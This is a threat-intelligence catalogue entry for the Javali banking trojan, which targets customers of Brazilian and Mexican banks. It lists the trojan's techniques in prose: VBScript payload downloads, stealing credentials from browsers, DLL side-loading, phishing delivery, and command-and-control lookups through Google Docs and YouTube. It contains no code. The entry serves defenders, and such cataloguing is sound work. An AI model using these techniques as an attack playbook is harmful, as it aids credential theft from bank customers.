Skip to content

S0528 Javali

Javali is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.1

Item Value
ID S0528
Associated Names
Version 1.0
Created 09 November 2020
Last Modified 22 December 2020
Navigation Layer View In ATT&CK® Navigator

Techniques Used

Domain ID Name Use
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.005 Visual Basic Javali has used embedded VBScript to download malicious payloads from C2.1
enterprise T1555 Credentials from Password Stores -
enterprise T1555.003 Credentials from Web Browsers Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.1
enterprise T1574 Hijack Execution Flow -
enterprise T1574.002 DLL Side-Loading Javali can use DLL side-loading to load malicious DLLs into legitimate executables.1
enterprise T1105 Ingress Tool Transfer Javali can download payloads from remote C2 servers.1
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.001 Binary Padding Javali can use large obfuscated libraries to hinder detection and analysis.1
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment Javali has been delivered as malicious e-mail attachments.1
enterprise T1566.002 Spearphishing Link Javali has been delivered via malicious links embedded in e-mails.1
enterprise T1057 Process Discovery Javali can monitor processes for open browsers and custom banking applications.1
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.007 Msiexec Javali has used the MSI installer to download and execute malicious payloads.1
enterprise T1204 User Execution -
enterprise T1204.001 Malicious Link Javali has achieved execution through victims clicking links to malicious websites.1
enterprise T1204.002 Malicious File Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.1
enterprise T1102 Web Service -
enterprise T1102.001 Dead Drop Resolver Javali can read C2 information from Google Documents and YouTube.1